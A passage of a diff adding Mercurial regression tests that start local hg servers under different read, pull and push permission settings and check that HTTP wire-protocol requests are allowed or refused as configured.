+ $ hg clone test test2 + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ cd test2 + $ echo a >> a + $ hg ci -mb + $ hg book bm -r 0 + $ cd ../test + +web.deny_read=* prevents access to wire protocol for all users + + $ cat > .hg/hgrc < [web] + > deny_read = * + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=capabilities' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=stream_out' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read=* with REMOTE_USER set still locks out clients + + $ REMOTE_USER=authed_user hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=capabilities' + 401 read not authorized + + 0 + 
read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=stream_out' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read= denies access to unauthenticated user + + $ cat > .hg/hgrc < [web] + > deny_read = baduser1,baduser2 + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + 
read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read= denies access to users in deny list + + $ REMOTE_USER=baduser2 hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read= allows access to authenticated users not in list + + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 
'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read=* allows reads for unauthenticated users + + $ cat > .hg/hgrc < [web] + > allow_read = * + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request 
+ + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read=* allows read for authenticated user + + $ REMOTE_USER=authed_user hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read= does not allow unauthenticated users to read + + $ cat > .hg/hgrc < [web] + > allow_read = gooduser + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ 
"$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read= does not allow user not in list to read + + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ 
"$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read= allows read from user in list + + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read takes precedence over web.allow_read + + $ cat > .hg/hgrc < [web] + > allow_read = baduser + > deny_read = baduser + > EOF + + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 
'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allowpull=false denies read access to repo + + $ cat > .hg/hgrc < [web] + > allowpull = false + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=capabilities' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" 
$LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +Attempting a write command with HTTP GET fails + + $ cat > .hg/hgrc < EOF + + $ REQUEST_METHOD=GET hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg bookmarks + no bookmarks set + $ hg bookmark -d bm + abort: bookmark 'bm' does not exist + [255] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +Attempting a write command with an unknown HTTP verb fails + + $ REQUEST_METHOD=someverb hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ 
"$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg bookmarks + no bookmarks set + $ hg bookmark -d bm + abort: bookmark 'bm' does not exist + [255] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +Pushing on a plaintext channel is disabled by default + + $ cat > .hg/hgrc < EOF + + $ REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 403 ssl required + + 0 + ssl required + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 403 ssl required + + 0 + ssl required + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 403 ssl required + + 0 + ssl required + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 403 ssl required + + 0 + ssl required + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + 
exporting bookmark bm + abort: HTTP Error 403: ssl required + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: HTTP Error 403: ssl required + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push=* denies pushing to unauthenticated users + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > deny_push = * + > EOF + + $ REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push=* denies pushing to authenticated users + + $ REMOTE_USER=someuser 
REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push= denies pushing to user in list + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > deny_push = baduser + > EOF + + $ REMOTE_USER=baduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + 
$ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push= denies pushing to user not in list because allow_push isn't set + + $ REMOTE_USER=gooduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 
push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push=* allows pushes from unauthenticated users + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = * + > EOF + + $ REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 200 Script output follows + + write command no defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 200 Script output follows + + write command w/ defined permissions + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > 